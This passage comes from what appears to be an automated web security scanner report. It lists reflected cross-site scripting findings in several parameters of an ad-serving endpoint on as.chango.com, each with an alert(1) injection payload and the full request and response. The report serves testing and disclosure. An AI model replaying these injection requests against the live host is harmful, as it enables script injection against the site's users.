<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.25. http://as.chango.com/links/adunit/1.31759988192e+12 [datc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5ec"><script>alert(1)</script>1085ffe8a15 was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+joseaa5ec"><script>alert(1)</script>1085ffe8a15&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a29d24cc6e07eb15125d8d1b3ceb62291aecc91c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:05 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:05 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:05 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
tball/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san joseaa5ec"><script>alert(1)</script>1085ffe8a15&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu
...[SNIP]...

4.26. http://as.chango.com/links/adunit/1.31759988192e+12 [dc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b406f"><script>alert(1)</script>02b8bac3890 was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f2ff7ee7580ca0f599186a62d9136e72ad18ae1a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:07 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:07 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemediab406f%22%3E%3Cscript%3Ealert%281%29%3C/script%3E02b8bac3890%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:07 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
dian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae46
...[SNIP]...

4.27. http://as.chango.com/links/adunit/1.31759988192e+12 [dom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e1e"><script>alert(1)</script>6db27d1746e was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "3b9cdd9277b1c295e99fb4dc357a0b4d01f3458b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:10 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:10 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:10 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ck1=http://as.chango.com/links/click1317599950.77?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware
...[SNIP]...

4.28. http://as.chango.com/links/adunit/1.31759988192e+12 [eid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b611"><script>alert(1)</script>1eedbcf2072 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "59a5142f96efa33ad5f002277312b5f2c31c491d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 2349
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:23 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon8b611%22%3E%3Cscript%3Ealert%281%29%3C/script%3E1eedbcf2072%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:23 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
36?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=0&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...

4.29. http://as.chango.com/links/adunit/1.31759988192e+12 [ht parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45475"><script>alert(1)</script>21ae6b0bc46 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=25045475"><script>alert(1)</script>21ae6b0bc46&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "5ba78575886bd3594b59106bc3638a8dfdeb6a66"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:26 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:26 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300px; height: 25045475"><script>alert(1)</script>21ae6b0bc46px; margin: 0; padding: 0;">
...[SNIP]...

4.30. http://as.chango.com/links/adunit/1.31759988192e+12 [ibs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd05"><script>alert(1)</script>4ccae8e57d1 was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c9ad73da996eca9026305ba55d6dd77afee7681f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:28 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:28 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:28 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
//as.chango.com/links/click1317599968.42?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=
...[SNIP]...

4.31. http://as.chango.com/links/adunit/1.31759988192e+12 [poo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b15f"><script>alert(1)</script>0aaee42b2aa was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "238ea0fb61ae84561530a6e4e50ebda879606458"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:38 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:38 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:38 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
om/links/click1317599978.28?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=
...[SNIP]...

4.32. http://as.chango.com/links/adunit/1.31759988192e+12 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4215"><script>alert(1)</script>69873abae82 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "7cff87f18ac98ed42845ee33f9e6e0bf79efaf95"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:39 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:39 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:39 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
tp://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455
...[SNIP]...

4.33. http://as.chango.com/links/adunit/1.31759988192e+12 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
